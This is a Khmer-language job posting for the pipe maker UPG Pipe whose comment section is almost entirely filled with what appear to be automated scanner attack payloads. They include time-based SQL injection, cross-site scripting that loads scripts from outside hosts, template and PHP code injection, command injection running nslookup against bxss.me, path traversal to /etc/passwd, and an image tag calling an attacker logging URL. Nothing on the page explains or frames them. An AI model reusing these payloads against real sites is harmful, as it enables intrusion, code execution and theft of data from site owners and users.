ថ្ងៃទី 14 - 15 ខែ វិច្ឆិកា ឆ្នាំ 2020 ក្រសួងការងារ និងបណ្តុះបណ្តាលវិជ្ជាជីវៈ

យូ ភី ជី ផាយផ៍ ឯ.ក
យូ ភី ជី ផាយផ៍ជាក្រុមហ៊ុនផលិតឈានមុខគេ និងបានអភិវឌ្ឈន៍ខ្លួនក្លាយជារោងចក្រធំជាងគេក្នុងវិស័យផលិតកម្ម ដែលមានផ្គត់ផ្គង់បំពង់ទីបជ័រសញ្ញាឥន្រ្ទីប្រកបដោយគុណភាពខ្ពស់ គ្រឿងតំណ និងមុខកាត់ប្រកបដោយបច្ចេកវិទ្យាទំនើបចុងក្រោយបំផុត។

ដាក់ពាក្យស្មើសុំការងារ (CV)!

ចំនួន CV ដែលបានដាក់ពាក្យរួច 43

សូមរៀបចំ CV ជាទម្រង់ Microsoft Word, PDF ឬជារូបភាព JPG។ ទំហំមិនធំជាង 5MB។


តម្រូវការជ្រើសរើសកម្លាំងពលកម្ម សរុប 95 កន្លែង

   
សំណួរ ចម្លើយ ឬ មតិយោបល់ ទៅក្រុមហ៊ុន

 • pHqghUme

  2021-05-06 08:02:31


  @@xbJv6


 • pHqghUme

  2021-05-06 08:02:29


  1'"


 • pHqghUme

  2021-05-06 08:02:28


  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


 • pHqghUme

  2021-05-06 08:02:23


  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


 • pHqghUme

  2021-05-06 08:02:17


  jzCkrJ5m')) OR 114=(SELECT 114 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:02:10


  iEuqxLuP') OR 984=(SELECT 984 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:02:03


  pVfILsbN' OR 868=(SELECT 868 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:01:55


  -1)) OR 303=(SELECT 303 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:01:47


  -5) OR 433=(SELECT 433 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:01:38


  -5 OR 854=(SELECT 854 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:01:30


  bvnPlHan'; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:01:22


  1 waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:01:13


  -1); waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:01:05


  -1; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:00:57


  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


 • pHqghUme

  2021-05-06 08:00:47


  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z


 • pHqghUme

  2021-05-06 08:00:38


  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z


 • pHqghUme

  2021-05-06 08:00:30


  if(now()=sysdate(),sleep(15),0)


 • pHqghUme

  2021-05-06 08:00:16


  -1" OR 2+510-510-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 08:00:14


  -1' OR 2+151-151-1=0+0+0+1 or '6hQQIMzx'='


 • pHqghUme

  2021-05-06 08:00:13


  -1 OR 2+543-543-1=0+0+0+1


 • pHqghUme

  2021-05-06 08:00:13


  -1' OR 2+135-135-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 08:00:12


  -1 OR 2+931-931-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 08:00:11


  3OKf2wCo


 • pHqghUme

  2021-05-06 07:59:59


  1


 • pHqghUme

  2021-05-06 07:59:47


  1


 • @@tzE5N

  2021-05-06 07:59:32


  1


 • 1'"

  2021-05-06 07:59:22


  1


 • pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  2021-05-06 07:59:21


  1


 • VGayDAmU')) OR 85=(SELECT 85 FROM PG_SLEEP(15))--

  2021-05-06 07:59:07


  1


 • HQdC42EC') OR 627=(SELECT 627 FROM PG_SLEEP(15))--

  2021-05-06 07:58:53


  1


 • 9tptZ7Uh' OR 819=(SELECT 819 FROM PG_SLEEP(15))--

  2021-05-06 07:58:39


  1


 • wgMSjkTg'; waitfor delay '0:0:15' --

  2021-05-06 07:58:26


  1


 • 1 waitfor delay '0:0:15' --

  2021-05-06 07:58:16


  1


 • (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  2021-05-06 07:58:05


  1


 • 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  2021-05-06 07:57:56


  1


 • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  2021-05-06 07:57:47


  1


 • if(now()=sysdate(),sleep(15),0)

  2021-05-06 07:57:35


  1


 • -1" OR 2+359-359-1=0+0+0+1 --

  2021-05-06 07:57:23


  1


 • -1' OR 2+266-266-1=0+0+0+1 or 'Wc1gjCb5'='

  2021-05-06 07:57:22


  1


 • -1' OR 2+745-745-1=0+0+0+1 --

  2021-05-06 07:57:21


  1


 • -1 OR 2+684-684-1=0+0+0+1

  2021-05-06 07:57:20


  1


 • -1 OR 2+903-903-1=0+0+0+1 --

  2021-05-06 07:57:19


  1


 • EWEmrsmH

  2021-05-06 07:57:18


  1


 • pHqghUme

  2021-05-06 07:57:02


  1


 • pHqghUme

  2021-05-06 07:56:51


  1


 • pHqghUme

  2021-05-06 07:56:35


  1


 • pHqghUme

  2021-05-06 07:56:31


  1


 • pHqghUme

  2021-05-06 07:56:30


  1


 • pHqghUme

  2021-05-06 07:56:18


  1


 • pHqghUme

  2021-05-06 07:56:06


  1


 • pHqghUme

  2021-05-06 07:55:52


  1


 • pHqghUme

  2021-05-06 07:55:36


  1


 • pHqghUme

  2021-05-06 07:55:16


  1


 • pHqghUme

  2021-05-06 07:54:51


  1


 • pHqghUme

  2021-05-06 07:54:25


  1


 • pHqghUme

  2021-05-06 07:54:00


  1


 • pHqghUme

  2021-05-06 07:53:35


  1


 • pHqghUme

  2021-05-06 07:53:12


  1


 • pHqghUme

  2021-05-06 07:53:12


  1


 • pHqghUme

  2021-05-06 07:53:11


  1


 • pHqghUme

  2021-05-06 07:53:10


  1


 • pHqghUme

  2021-05-06 07:53:10


  1


 • pHqghUme

  2021-05-06 07:53:09


  1


 • pHqghUme

  2021-05-06 07:52:50


  1


 • pHqghUme

  2021-05-06 07:52:35


  1


 • pHqghUme

  2021-05-06 07:52:22


  1


 • pHqghUme

  2021-05-06 07:52:18


  1


 • pHqghUme

  2021-05-06 07:52:17


  1


 • pHqghUme

  2021-05-06 07:52:02


  1


 • pHqghUme

  2021-05-06 07:51:47


  1


 • pHqghUme

  2021-05-06 07:51:31


  1


 • pHqghUme

  2021-05-06 07:51:13


  1


 • pHqghUme

  2021-05-06 07:50:59


  1


 • pHqghUme

  2021-05-06 07:50:39


  1


 • pHqghUme

  2021-05-06 07:50:19


  1


 • pHqghUme

  2021-05-06 07:50:02


  1


 • pHqghUme

  2021-05-06 07:49:42


  1


 • pHqghUme

  2021-05-06 07:49:42


  1<VzeLLR<


 • pHqghUme

  2021-05-06 07:49:38


  1<img sRc='http://attacker-9977/log.php?


 • pHqghUme

  2021-05-06 07:49:33


  1<5T9gFW x=9421>


 • pHqghUme

  2021-05-06 07:49:27


  1<ifRAme sRc=9717.com></IfRamE>


 • pHqghUme

  2021-05-06 07:49:23


  1


 • pHqghUme

  2021-05-06 07:49:22


  1


 • pHqghUme

  2021-05-06 07:49:22


  1


 • pHqghUme

  2021-05-06 07:49:22


  1<WLXGGI>6HK5D[!+!]</WLXGGI>


 • pHqghUme

  2021-05-06 07:49:21


  1


 • pHqghUme

  2021-05-06 07:49:20


  1


 • pHqghUme

  2021-05-06 07:49:19


  1


 • pHqghUme

  2021-05-06 07:49:13


  1rdW4d <ScRiPt >01GT(9590)</ScRiPt>


 • pHqghUme

  2021-05-06 07:49:08


  1<% contenteditable onresize=01GT(9892)>


 • pHqghUme

  2021-05-06 07:49:03


  1}body{acu:Expre/**/SSion(01GT(9753))}


 • pHqghUme

  2021-05-06 07:48:56


  <a HrEF=jaVaScRiPT:>


 • pHqghUme

  2021-05-06 07:48:51


  <a HrEF=http://xss.bxss.me></a>


 • pHqghUme

  2021-05-06 07:48:50


  1


 • pHqghUme

  2021-05-06 07:48:46


  1<input autofocus onfocus=01GT(9410)>


 • pHqghUme

  2021-05-06 07:48:39


  1&lt;ScRiPt&gt;01GT(9789)&lt;/sCripT&gt;


 • pHqghUme

  2021-05-06 07:48:34


  1\u003CScRiPt\01GT(9159)\u003C/sCripT\u003E


 • pHqghUme

  2021-05-06 07:48:28


  %31%3C%53%63%52%69%50%74%20%3E%30%31%47%54%289926%29%3C%2F%73%43%72%69%70%54%3E


 • pHqghUme

  2021-05-06 07:48:27


  1


 • pHqghUme

  2021-05-06 07:48:24


  1<img/src=">" onerror=alert(9045)>


 • pHqghUme

  2021-05-06 07:48:19


  1<img src=xyz OnErRor=01GT(9357)>


 • pHqghUme

  2021-05-06 07:48:14


  1<img src=//xss.bxss.me/t/dot.gif onload=01GT(9600)>


 • pHqghUme

  2021-05-06 07:48:09


  1<body onload=01GT(9089)>


 • pHqghUme

  2021-05-06 07:48:04


  1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9637'>


 • pHqghUme

  2021-05-06 07:47:56


  1<isindex type=image src=1 onerror=01GT(9015)>


 • pHqghUme

  2021-05-06 07:47:48


  1<ScRiPt >01GT(9727)</ScRiPt>


 • pHqghUme

  2021-05-06 07:47:39


  1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9471></ScRiPt>


 • pHqghUme

  2021-05-06 07:47:29


  1<ScRiPt >01GT(9901)</ScRiPt>


 • pHqghUme

  2021-05-06 07:47:21


  1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%30%31%47%54%28%39%34%39%32%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E


 • pHqghUme

  2021-05-06 07:47:13


  1<script>01GT(9058)</script>


 • pHqghUme

  2021-05-06 07:47:01


  1<WGW3X8>WEQQU[!+!]</WGW3X8>


 • pHqghUme

  2021-05-06 07:46:47


  1<ScRiPt >01GT(9404)</ScRiPt>


 • pHqghUme

  2021-05-06 07:46:34


  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")


 • pHqghUme

  2021-05-06 07:46:28


  acx__${98991*97996}__::.x


 • pHqghUme

  2021-05-06 07:46:21


  acx[[${98991*97996}]]xca


 • pHqghUme

  2021-05-06 07:46:15


  acx{{98991*97996}}xca


 • pHqghUme

  2021-05-06 07:46:07


  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 07:46:01


  <th:t="${acx}#foreach


 • pHqghUme

  2021-05-06 07:45:49


  <%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 07:45:40


  acux5520%C0%BEz1%C0%BCz2a%90bcxuca5520


 • pHqghUme

  2021-05-06 07:45:33


  acu3688%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca3688


 • pHqghUme

  2021-05-06 07:45:26


  19268027


 • pHqghUme

  2021-05-06 07:45:20


  '"()&%<acx><ScRiPt >01GT(9063)</ScRiPt>


 • pHqghUme

  2021-05-06 07:45:14


  1'"()&%<acx><ScRiPt >01GT(9049)</ScRiPt>


 • pHqghUme<XM82i0<

  2021-05-06 07:45:08


  1


 • pHqghUme<img sRc='http://attacker-9710/log.php?

  2021-05-06 07:45:03


  1


 • pHqghUme<cR3Fz8 x=9571>

  2021-05-06 07:44:57


  1


 • pHqghUme<ifRAme sRc=9636.com></IfRamE>

  2021-05-06 07:44:52


  1


 • pHqghUme<WD0AQR>F8RZM[!+!]</WD0AQR>

  2021-05-06 07:44:45


  1


 • pHqghUme6fX7t <ScRiPt >01GT(9464)</ScRiPt>

  2021-05-06 07:44:40


  1


 • pHqghUme<% contenteditable onresize=01GT(9717)>

  2021-05-06 07:44:33


  1


 • pHqghUme}body{acu:Expre/**/SSion(01GT(9228))}

  2021-05-06 07:44:27


  1


 • <a HrEF=jaVaScRiPT:>

  2021-05-06 07:44:21


  1


 • <a HrEF=http://xss.bxss.me></a>

  2021-05-06 07:44:14


  1


 • pHqghUme<input autofocus onfocus=01GT(9577)>

  2021-05-06 07:44:08


  1


 • pHqghUme&lt;ScRiPt&gt;01GT(9455)&lt;/sCripT&gt;

  2021-05-06 07:43:59


  1


 • pHqghUme\u003CScRiPt\01GT(9081)\u003C/sCripT\u003E

  2021-05-06 07:43:50


  1


 • %70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%30%31%47%54%289627%29%3C%2F%73%43%72%69%70%54%3E

  2021-05-06 07:43:41


  1


 • pHqghUme<img/src=">" onerror=alert(9106)>

  2021-05-06 07:43:35


  1


 • pHqghUme<img src=xyz OnErRor=01GT(9661)>

  2021-05-06 07:43:28


  1


 • pHqghUme<img src=//xss.bxss.me/t/dot.gif onload=01GT(9286)>

  2021-05-06 07:43:22


  1


 • pHqghUme<body onload=01GT(9640)>

  2021-05-06 07:43:15


  1


 • pHqghUme<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9245'>

  2021-05-06 07:43:08


  1


 • pHqghUme<isindex type=image src=1 onerror=01GT(9019)>

  2021-05-06 07:43:04


  1


 • pHqghUme<ScRiPt >01GT(9930)</ScRiPt>

  2021-05-06 07:42:55


  1


 • pHqghUme<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9345></ScRiPt>

  2021-05-06 07:42:48


  1


 • pHqghUme

  2021-05-06 07:42:44


  1


 • pHqghUme<ScRiPt >01GT(9047)</ScRiPt>

  2021-05-06 07:42:43


  1


 • pHqghUme%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%30%31%47%54%28%39%31%35%30%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

  2021-05-06 07:42:38


  1


 • pHqghUme<script>01GT(9802)</script>

  2021-05-06 07:42:32


  1


 • pHqghUme<WYH6Y5>169TU[!+!]</WYH6Y5>

  2021-05-06 07:42:25


  1


 • pHqghUme<ScRiPt >01GT(9855)</ScRiPt>

  2021-05-06 07:42:20


  1


 • pHqghUme

  2021-05-06 07:42:17


  1


 • "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

  2021-05-06 07:41:59


  1


 • acx__${98991*97996}__::.x

  2021-05-06 07:41:53


  1


 • pHqghUme

  2021-05-06 07:41:46


  ${@print(md5(31337))}\


 • acx[[${98991*97996}]]xca

  2021-05-06 07:41:46


  1


 • pHqghUme

  2021-05-06 07:41:46


  '.print(md5(31337)).'


 • pHqghUme

  2021-05-06 07:41:45


  ${@print(md5(31337))}


 • pHqghUme

  2021-05-06 07:41:44


  ";print(md5(31337));$a="


 • pHqghUme

  2021-05-06 07:41:43


  ';print(md5(31337));$a='


 • pHqghUme

  2021-05-06 07:41:42


  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));


 • '.print(md5(31337)).'

  2021-05-06 07:41:41


  1


 • ${@print(md5(31337))}\

  2021-05-06 07:41:40


  1


 • acx{{98991*97996}}xca

  2021-05-06 07:41:40


  1


 • ${@print(md5(31337))}

  2021-05-06 07:41:39


  1


 • ';print(md5(31337));$a='

  2021-05-06 07:41:37


  1


 • ";print(md5(31337));$a="

  2021-05-06 07:41:37


  1


 • ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

  2021-05-06 07:41:36


  1


 • pHqghUme

  2021-05-06 07:41:35


  1


 • pHqghUme

  2021-05-06 07:41:34


  1


 • pHqghUme

  2021-05-06 07:41:33


  1


 • 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

  2021-05-06 07:41:33


  1


 • pHqghUme

  2021-05-06 07:41:32


  1


 • pHqghUme

  2021-05-06 07:41:32


  1


 • pHqghUme

  2021-05-06 07:41:30


  1


 • <th:t="${acx}#foreach

  2021-05-06 07:41:29


  1


 • pHqghUme

  2021-05-06 07:41:29


  1


 • pHqghUme

  2021-05-06 07:41:27


  1


 • pHqghUme

  2021-05-06 07:41:27


  1


 • pHqghUme

  2021-05-06 07:41:26


  1


 • pHqghUme

  2021-05-06 07:41:24


  1


 • <%={{={@{#{${acx}}%>

  2021-05-06 07:41:23


  1


 • pHqghUme

  2021-05-06 07:41:23


  1


 • acux5645%C0%BEz1%C0%BCz2a%90bcxuca5645

  2021-05-06 07:41:17


  1


 • acu4350%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca4350

  2021-05-06 07:41:13


  1


 • pHqghUme9770386

  2021-05-06 07:40:57


  1


 • '"()&%<acx><ScRiPt >01GT(9885)</ScRiPt>

  2021-05-06 07:40:52


  1


 • pHqghUme'"()&%<acx><ScRiPt >01GT(9803)</ScRiPt>

  2021-05-06 07:40:44


  1


 • pHqghUme

  2021-05-06 07:40:38


  1


 • pHqghUme

  2021-05-06 07:40:32


  1


 • pHqghUme

  2021-05-06 07:40:26


  1


 • pHqghUme

  2021-05-06 07:40:22


  1


 • pHqghUme

  2021-05-06 07:40:17


  1


 • pHqghUme

  2021-05-06 07:40:11


  1


 • pHqghUme

  2021-05-06 07:40:08


  <!--


 • <!--

  2021-05-06 07:40:07


  1


 • pHqghUme

  2021-05-06 07:40:07


  '"


 • '"

  2021-05-06 07:40:06


  1


 • pHqghUme

  2021-05-06 07:40:05


  1


 • pHqghUme

  2021-05-06 07:40:05


  1


 • pHqghUme

  2021-05-06 07:40:05


  1


 • pHqghUme

  2021-05-06 07:40:04


  '"()


 • pHqghUme

  2021-05-06 07:40:04


  1


 • pHqghUme

  2021-05-06 07:40:03


  /xfs.bxss.me


 • pHqghUme

  2021-05-06 07:40:03


  "+"A".concat(70-3).concat(22*4).concat(104).concat(67).concat(101).concat(68)+(require"socket" Socket.gethostbyname("hital"+"dsviuzuof7245.bxss.me.")[3].to_s)+"


 • pHqghUme

  2021-05-06 07:40:03


  '+'A'.concat(70-3).concat(22*4).concat(107).concat(80).concat(105).concat(66)+(require'socket' Socket.gethostbyname('hitub'+'ecnoyuvjf0c09.bxss.me.')[3].to_s)+'


 • pHqghUme

  2021-05-06 07:40:02


  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


 • /xfs.bxss.me

  2021-05-06 07:40:02


  1


 • '+'A'.concat(70-3).concat(22*4).concat(114).concat(75).concat(112).concat(87)+(require'socket' Socket.gethostbyname('hittz'+'sfggbypr64e8e.bxss.me.')[3].to_s)+'

  2021-05-06 07:40:02


  1


 • pHqghUme

  2021-05-06 07:40:01


  1


 • "+"A".concat(70-3).concat(22*4).concat(98).concat(73).concat(103).concat(68)+(require"socket" Socket.gethostbyname("hitri"+"owtwhbtn2e860.bxss.me.")[3].to_s)+"

  2021-05-06 07:40:01


  1


 • pHqghUme

  2021-05-06 07:40:00


  1


 • pHqghUme

  2021-05-06 07:40:00


  1


 • '"()

  2021-05-06 07:40:00


  1


 • pHqghUme

  2021-05-06 07:40:00


  1


 • )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  2021-05-06 07:40:00


  1


 • pHqghUme

  2021-05-06 07:40:00


  1


 • pHqghUme

  2021-05-06 07:39:59


  1


 • pHqghUme

  2021-05-06 07:39:59


  1


 • pHqghUme

  2021-05-06 07:39:59


  1


 • pHqghUme

  2021-05-06 07:39:58


  bxss.me/t/xss.html?%00


 • bxss.me/t/xss.html?%00

  2021-05-06 07:39:57


  1


 • pHqghUme

  2021-05-06 07:39:57


  HttP://bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 07:39:56


  '.gethostbyname(lc('hitib'.'tglzoozd8875a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(73).chr(99).chr(71).'


 • pHqghUme

  2021-05-06 07:39:56


  1


 • pHqghUme

  2021-05-06 07:39:56


  ".gethostbyname(lc("hitxj"."pnebidzq934e3.bxss.me."))."A".chr(67).chr(hex("58")).chr(101).chr(77).chr(108).chr(84)."


 • pHqghUme

  2021-05-06 07:39:56


  1


 • HttP://bxss.me/t/xss.html?%00

  2021-05-06 07:39:56


  1


 • '.gethostbyname(lc('hitgf'.'zzhssyfi7518c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(106).chr(72).chr(121).chr(89).'

  2021-05-06 07:39:55


  1


 • pHqghUme

  2021-05-06 07:39:55


  1


 • ".gethostbyname(lc("hitdn"."gfudjsbgb3f94.bxss.me."))."A".chr(67).chr(hex("58")).chr(113).chr(81).chr(100).chr(79)."

  2021-05-06 07:39:55


  1


 • pHqghUme

  2021-05-06 07:39:55


  1


 • pHqghUme

  2021-05-06 07:39:54


  1


 • pHqghUme

  2021-05-06 07:39:54


  1


 • pHqghUme

  2021-05-06 07:39:54


  1


 • pHqghUme

  2021-05-06 07:39:53


  1


 • pHqghUme

  2021-05-06 07:39:53


  1


 • pHqghUme

  2021-05-06 07:39:53


  1


 • pHqghUme

  2021-05-06 07:39:52


  )


 • pHqghUme

  2021-05-06 07:39:52


  !(()&&!|*|*|


 • pHqghUme

  2021-05-06 07:39:52


  ^(#$!@#$)(()))******


 • !(()&&!|*|*|

  2021-05-06 07:39:51


  1


 • ^(#$!@#$)(()))******

  2021-05-06 07:39:51


  1


 • )

  2021-05-06 07:39:50


  1


 • pHqghUme

  2021-05-06 07:39:49


  1


 • pHqghUme

  2021-05-06 07:39:49


  1


 • pHqghUme

  2021-05-06 07:39:49


  1


 • pHqghUme

  2021-05-06 07:39:48


  `(nslookup hitmklrpkihql392a0.bxss.me||perl -e "gethostbyname('hitmklrpkihql392a0.bxss.me')")`


 • pHqghUme

  2021-05-06 07:39:48


  1


 • pHqghUme

  2021-05-06 07:39:47


  1


 • pHqghUme

  2021-05-06 07:39:47


  |(nslookup hitadufwdausp1071c.bxss.me||perl -e "gethostbyname('hitadufwdausp1071c.bxss.me')")


 • pHqghUme

  2021-05-06 07:39:47


  1


 • pHqghUme

  2021-05-06 07:39:45


  12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡


 • pHqghUme

  2021-05-06 07:39:45


  1&n934119=v943842


 • pHqghUme

  2021-05-06 07:39:44


  http://bxss.me/t/fit.txt%3F.jpg


 • pHqghUme

  2021-05-06 07:39:44


  bxss.me


 • pHqghUme

  2021-05-06 07:39:43


  1some_inexistent_file_with_long_name%00.jpg


 • pHqghUme

  2021-05-06 07:39:43


  (nslookup hitmiapnbjfsh6291d.bxss.me||perl -e "gethostbyname('hitmiapnbjfsh6291d.bxss.me')")


 • pHqghUme

  2021-05-06 07:39:43


  Http://bxss.me/t/fit.txt


 • pHqghUme

  2021-05-06 07:39:43


  $(nslookup hitnwxluydxofb5b27.bxss.me||perl -e "gethostbyname('hitnwxluydxofb5b27.bxss.me')")


 • bxss.me

  2021-05-06 07:39:42


  1


 • pHqghUme

  2021-05-06 07:39:42


  &echo xjpgug$()\ yhvhzp\nz^xyu||a #' &echo xjpgug$()\ yhvhzp\nz^xyu||a #|" &echo xjpgug$()\ yhvhzp\nz^xyu||a #


 • pHqghUme

  2021-05-06 07:39:42


  http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg


 • pHqghUme

  2021-05-06 07:39:42


  |echo rqdglk$()\ zidaut\nz^xyu||a #' |echo rqdglk$()\ zidaut\nz^xyu||a #|" |echo rqdglk$()\ zidaut\nz^xyu||a #


 • Http://bxss.me/t/fit.txt

  2021-05-06 07:39:41


  1


 • http://bxss.me/t/fit.txt%3F.jpg

  2021-05-06 07:39:41


  1


 • pHqghUme

  2021-05-06 07:39:41


  echo ocdupz$()\ fgoqhd\nz^xyu||a #' &echo ocdupz$()\ fgoqhd\nz^xyu||a #|" &echo ocdupz$()\ fgoqhd\nz^xyu||a #


 • 1some_inexistent_file_with_long_name%00.jpg

  2021-05-06 07:39:40


  1


 • pHqghUme

  2021-05-06 07:39:39


  1


 • pHqghUme&n943447=v972085

  2021-05-06 07:39:39


  1


 • http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

  2021-05-06 07:39:39


  1


 • pHqghUme

  2021-05-06 07:39:38


  1


 • 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

  2021-05-06 07:39:38


  1


 • pHqghUme

  2021-05-06 07:39:38


  1


 • pHqghUme

  2021-05-06 07:39:37


  1


 • pHqghUme

  2021-05-06 07:39:37


  1


 • `(nslookup hithjvqgiygohcc772.bxss.me||perl -e "gethostbyname('hithjvqgiygohcc772.bxss.me')")`

  2021-05-06 07:39:36


  1


 • pHqghUme

  2021-05-06 07:39:36


  1


 • pHqghUme

  2021-05-06 07:39:36


  1


 • pHqghUme

  2021-05-06 07:39:35


  1


 • |(nslookup hitvbegqgshls379a4.bxss.me||perl -e "gethostbyname('hitvbegqgshls379a4.bxss.me')")

  2021-05-06 07:39:35


  1


 • pHqghUme

  2021-05-06 07:39:35


  1


 • pHqghUme

  2021-05-06 07:39:34


  1


 • pHqghUme

  2021-05-06 07:39:33


  1


 • (nslookup hitronxegezfeb984c.bxss.me||perl -e "gethostbyname('hitronxegezfeb984c.bxss.me')")

  2021-05-06 07:39:30


  1


 • $(nslookup hitfijtjffqur29d63.bxss.me||perl -e "gethostbyname('hitfijtjffqur29d63.bxss.me')")

  2021-05-06 07:39:30


  1


 • &echo dldvhb$()\ mbeeqy\nz^xyu||a #' &echo dldvhb$()\ mbeeqy\nz^xyu||a #|" &echo dldvhb$()\ mbeeqy\nz^xyu||a #

  2021-05-06 07:39:29


  1


 • |echo fbnyfh$()\ uckzlp\nz^xyu||a #' |echo fbnyfh$()\ uckzlp\nz^xyu||a #|" |echo fbnyfh$()\ uckzlp\nz^xyu||a #

  2021-05-06 07:39:29


  1


 • pHqghUme

  2021-05-06 07:39:28


  1


 • echo xhcyqf$()\ sgbwdi\nz^xyu||a #' &echo xhcyqf$()\ sgbwdi\nz^xyu||a #|" &echo xhcyqf$()\ sgbwdi\nz^xyu||a #

  2021-05-06 07:39:28


  1


 • ZTZxSVR3V2M=

  2021-05-06 07:39:24


  1


 • pHqghUme

  2021-05-06 07:39:23


  ${10000064+9999191}


 • pHqghUme

  2021-05-06 07:39:23


  1


 • pHqghUme

  2021-05-06 07:39:23


  1


 • pHqghUme

  2021-05-06 07:39:22


  1


 • ${9999072+9999112}

  2021-05-06 07:39:22


  1


 • pHqghUme

  2021-05-06 07:39:21


  1


 • pHqghUme<esi:include src="http://bxss.me/rpb.png"/>

  2021-05-06 07:39:20


  1


 • pHqghUme

  2021-05-06 07:39:20


  1


 • pHqghUme

  2021-05-06 07:39:20


  1<esi:include src="http://bxss.me/rpb.png"/>


 • pHqghUme

  2021-05-06 07:39:19


  1


 • pHqghUme

  2021-05-06 07:39:19


  1


 • pHqghUme

  2021-05-06 07:39:18


  1


 • pHqghUme

  2021-05-06 07:39:18


  1


 • pHqghUme

  2021-05-06 07:39:18


  1


 • pHqghUme

  2021-05-06 07:39:17


  1


 • pHqghUme

  2021-05-06 07:39:16


  1


 • pHqghUme

  2021-05-06 07:39:16


  1


 • pHqghUme

  2021-05-06 07:39:16


  ../1


 • pHqghUme

  2021-05-06 07:39:15


  ../../../../../../../../../../../../../../etc/passwd


 • pHqghUme

  2021-05-06 07:39:15


  ../../../../../../../../../../../../../../windows/win.ini


 • pHqghUme

  2021-05-06 07:39:14


  1


 • ../pHqghUme

  2021-05-06 07:39:14


  1


 • pHqghUme

  2021-05-06 07:39:13


  1


 • ../../../../../../../../../../../../../../etc/passwd

  2021-05-06 07:39:13


  1


 • ../../../../../../../../../../../../../../windows/win.ini

  2021-05-06 07:39:13


  1


 • pHqghUme

  2021-05-06 07:39:13


  1


 • pHqghUme

  2021-05-06 07:39:12


  1


 • pHqghUme

  2021-05-06 07:39:12


  1


 • pHqghUme

  2021-05-06 07:39:11


  1


 • pHqghUme

  2021-05-06 07:39:10


  1


 • pHqghUme

  2021-05-06 07:39:09


  1


 • pHqghUme

  2021-05-06 07:39:09


  1


 • pHqghUme

  2021-05-06 07:39:09


  1


 • pHqghUme

  2021-05-06 07:39:09


  1


 • pHqghUme

  2021-05-06 07:39:08


  1


 • pHqghUme

  2021-05-06 07:39:08


  1


 • pHqghUme

  2021-05-06 07:39:08


  1


 • pHqghUme

  2021-05-06 07:39:08


  1


 • pHqghUme

  2021-05-06 07:39:08


  1


 • pHqghUme

  2021-05-06 07:39:08


  1


 • pHqghUme

  2021-05-06 07:39:07


  1


 • pHqghUme

  2021-05-06 07:39:07


  1


 • pHqghUme

  2021-05-06 07:39:04


  '+response.write(9895593*9172352)+'


 • pHqghUme

  2021-05-06 07:39:04


  1


 • pHqghUme

  2021-05-06 07:39:04


  "+response.write(9895593*9172352)+"


 • "+response.write(9559944*9936325)+"

  2021-05-06 07:39:03


  1


 • pHqghUme

  2021-05-06 07:39:03


  response.write(9895593*9172352)


 • pHqghUme

  2021-05-06 07:39:02


  Z1dLVSaq


 • response.write(9559944*9936325)

  2021-05-06 07:39:01


  1


 • xYPwmOjs

  2021-05-06 07:39:01


  1


 • '+response.write(9559944*9936325)+'

  2021-05-06 07:39:01


  1


 • pHqghUme

  2021-05-06 07:39:00


  1


 • pHqghUme

  2021-05-06 07:39:00


  1


 • pHqghUme

  2021-05-06 07:39:00


  1


 • pHqghUme

  2021-05-06 07:38:59


  1


